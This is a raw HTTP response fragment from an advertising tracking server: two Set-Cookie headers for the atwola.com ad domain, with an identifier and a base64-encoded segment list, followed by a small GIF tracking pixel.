Set-Cookie: N=2:f09c3ed82a5deedcd5f3f90b36c3d89674bfe
5a8ec25802e
,820ce15ad71ebb5ed9e6683b5630c89d; expires=Mon, 11-Jun-12 10:41:46 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODI6NTcwOTQ6NjA3NDA6NTYyOTc6NTcxMzA6NTcxMjk6NTMzODA6NjA0ODk6NjA1MTU6NTI2MTU6NTcyODk6NTI5NDY6NTM2NTY6NTU0MDE6NTA1NTc6NTQyNTU6NTM3Nzg6NTQyNTI6NTA5NjE6NTQyMDk6NTY2ODE6NTU0Njc6NTY5Njk6NTY4MzU6NTY3ODA6NTYyMzI6NTY2NzM6NTY3Njg6NTczNzI=; expires=Mon, 11-Jun-12 10:41:46 GMT; path=/; domain=.at.atwola.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;